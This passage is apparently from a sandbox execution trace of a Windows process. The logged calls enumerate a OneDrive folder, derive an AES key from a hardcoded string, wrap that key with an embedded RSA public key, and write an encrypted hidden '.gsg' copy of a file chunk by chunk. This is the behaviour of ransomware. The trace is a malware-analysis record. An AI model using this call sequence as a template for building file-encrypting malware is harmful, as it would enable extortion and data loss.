lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\be\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa4c8 [0273.051] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0273.051] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0273.051] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0273.051] GetLastError () returned 0x0 [0273.052] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\be\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\be\\filesync.localizedresources.dll.mui")) returned 0x20 [0273.052] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\be\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0273.052] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\be\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\be\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0273.053] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\be\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\be\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0273.054] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\be\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0273.054] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f28f58) returned 1 [0273.057] CryptCreateHash (in: hProv=0x2f28f58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0273.057] lstrlenA (lpString="VjnQjmgTDrnneBnnDhUveiykzMlQm") returned 29 [0273.057] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb530, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0273.057] CryptDeriveKey (in: hProv=0x2f28f58, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2facc8) returned 1 [0273.057] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0273.057] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0273.057] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f29200) returned 1 [0273.058] CryptImportPublicKeyInfo (in: hCryptProv=0x2f29200, dwCertEncodingType=0x1, pInfo=0x2f333a0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f333d0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f333d8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2faa08) returned 1 [0273.058] CryptEncrypt (in: hKey=0x2faa08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0273.058] CryptEncrypt (in: hKey=0x2faa08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f290f0*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f290f0*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0273.058] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f290f0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f290f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0273.059] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.062] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.062] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.085] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.086] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.086] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.086] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.086] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.086] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.086] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.086] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.086] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.087] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.087] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.087] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.087] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.087] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.087] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.087] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.087] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.087] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.087] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.087] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.087] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.088] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.088] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.088] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.088] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.088] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.088] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.088] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.088] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.088] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.088] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.088] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.089] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.089] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.089] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.089] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.089] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.089] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.089] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.089] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.089] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.089] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.089] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.090] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.090] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.090] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.090] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.090] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.090] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.090] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.090] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.090] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.090] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.090] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.090] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.090] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.091] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.091] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.091] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.091] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.091] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.091] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.091] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.091] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.091] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.091] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.092] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.092] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.092] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.092] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.092] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.092] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.092] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.092] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.092] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.092] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.092] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.092] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.093] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, 